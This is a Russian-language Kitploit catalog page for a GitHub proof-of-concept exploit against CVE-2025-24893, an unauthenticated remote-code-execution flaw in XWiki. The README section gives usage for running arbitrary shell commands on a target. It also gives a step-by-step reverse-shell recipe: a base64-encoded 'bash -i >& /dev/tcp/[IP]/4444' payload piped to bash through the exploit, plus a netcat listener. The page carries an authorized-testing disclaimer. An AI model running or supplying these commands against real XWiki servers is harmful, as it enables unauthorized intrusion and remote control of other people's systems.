Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24893-PoC — Эксплойт для доказательства концепции уязвимости CVE-2025-24893, позволяющий выполнять неавторизованный удаленный код на XWiki с произвольными командами оболочки и внедрением обратной оболочки через Python. | Kitploit
Инструменты/GitHubGitHub/dhiaznaidi/cve-2025-24893-poc
ЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubdhiaznaidi/cve-2025-24893-poc

CVE-2025-24893-PoC

Эксплойт для доказательства концепции уязвимости CVE-2025-24893, позволяющий выполнять неавторизованный удаленный код на XWiki с произвольными командами оболочки и внедрением обратной оболочки через Python.

Репозиторий
41 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24893 - XWiki Удаленное выполнение кода (RCE)

Обновленный эксплойт proof-of-concept (PoC) для CVE-2025-24893, критической уязвимости RCE без аутентификации в XWiki. Эта версия улучшает оригинал, позволяя выполнение произвольных команд оболочки и чистую инъекцию обратной оболочки.

Автор: HexHunter404


⚠️ Предупреждение

Этот код предоставляется только для образовательных целей и авторизованного тестирования на проникновение.
Не используйте его в системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


✨ Возможности

  • Поддерживает выполнение команд через bash -c '<command>'
  • Полностью поддерживает обратные оболочки (через base64 для обхода проблем с Groovy)
  • Улучшенная обработка вывода команд
  • Сохраняет путь /xwiki и избегает циклов перенаправления

🐍 Использование

python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"

🐚 Получение обратной оболочки

. Закодируйте вашу обратную оболочку в Base64

echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64

. Отправьте её с помощью PoC

python3  CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"

. Настройте ваш слушатель

nc -lvnp 4444

В случае успеха вы получите оболочку

Скачать инструмент